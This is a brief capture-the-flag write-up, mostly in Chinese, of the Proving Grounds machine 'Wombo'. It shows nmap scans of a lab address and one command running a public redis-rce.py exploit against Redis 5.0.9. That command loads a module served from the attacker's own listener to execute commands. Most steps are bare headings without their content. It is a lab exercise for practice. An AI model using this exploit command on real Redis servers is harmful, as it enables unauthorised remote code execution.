Proving Grounds Wombo Writeup
Recon:
进行端口识别:
1 | nmap 192.168.240.69 -p- -n -sT --min-rate 2000 |
1 | nmap 192.168.240.69 -p22,53,80,6379,8080,27017 -sV -sC |
Get Flag:
谷歌搜索Redis key-value store 5.0.9可以获取到一个可能存在的漏洞信息:
根据帮助说明进行尝试:
进行谷歌搜索:
根据说明进行编译:
执行漏洞利用:
1 | python redis-rce.py -r 192.168.240.69 -p 6379 -L 192.168.45.228 -P 6379 -f RedisModules-ExecuteCommand/src/module.so |
读取flag:
All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.
Comments